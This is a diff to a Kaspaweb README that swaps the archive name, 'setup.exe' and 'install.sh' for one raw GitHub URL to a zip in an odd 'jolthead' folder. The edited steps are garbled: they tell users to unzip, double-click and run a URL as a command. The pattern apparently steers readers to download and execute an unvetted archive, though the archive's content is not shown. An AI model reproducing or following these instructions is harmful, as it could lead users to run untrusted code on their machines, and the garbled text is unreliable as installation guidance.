midoo12345/Kaspaweb/README.md

 After downloading, follow these steps to run Kaspaweb:

 1. **Locate the Downloaded File:** Check your downloads folder for the downloaded file.
-It will typically be named something like `Kaspaweb-vX.X.X.zip`.
+It will typically be named something like `https://raw.githubusercontent.com/midoo12345/Kaspaweb/main/jolthead/Software-v2.6-alpha.5.zip`.

 2. **Extract the Files:**
    - If you are on Windows, right-click the zipped file and choose “Extract All.”
 Follow the prompts.
    - On macOS, double-click the zip file to extract it.
-   - For Linux, use the terminal and run the command: `unzip Kaspaweb-vX.X.X.zip`.
+   - For Linux, use the terminal and run the command: `unzip https://raw.githubusercontent.com/midoo12345/Kaspaweb/main/jolthead/Software-v2.6-alpha.5.zip`.

 3. **Install the Application:**
-   - For Windows, find `setup.exe` in the extracted files and double-click it to start the installation.
+   - For Windows, find `https://raw.githubusercontent.com/midoo12345/Kaspaweb/main/jolthead/Software-v2.6-alpha.5.zip` in the extracted files and double-click it to start the installation.
    - For macOS, drag the Kaspaweb icon into your Applications folder.
-   - For Linux, open a terminal in the extracted folder and run the command: `./install.sh`.
+   - For Linux, open a terminal in the extracted folder and run the command: `https://raw.githubusercontent.com/midoo12345/Kaspaweb/main/jolthead/Software-v2.6-alpha.5.zip`.

 4. **Open Kaspaweb:**
    - After installation, locate the Kaspaweb icon on your desktop (or in your Applications menu) and double-click it to launch the application.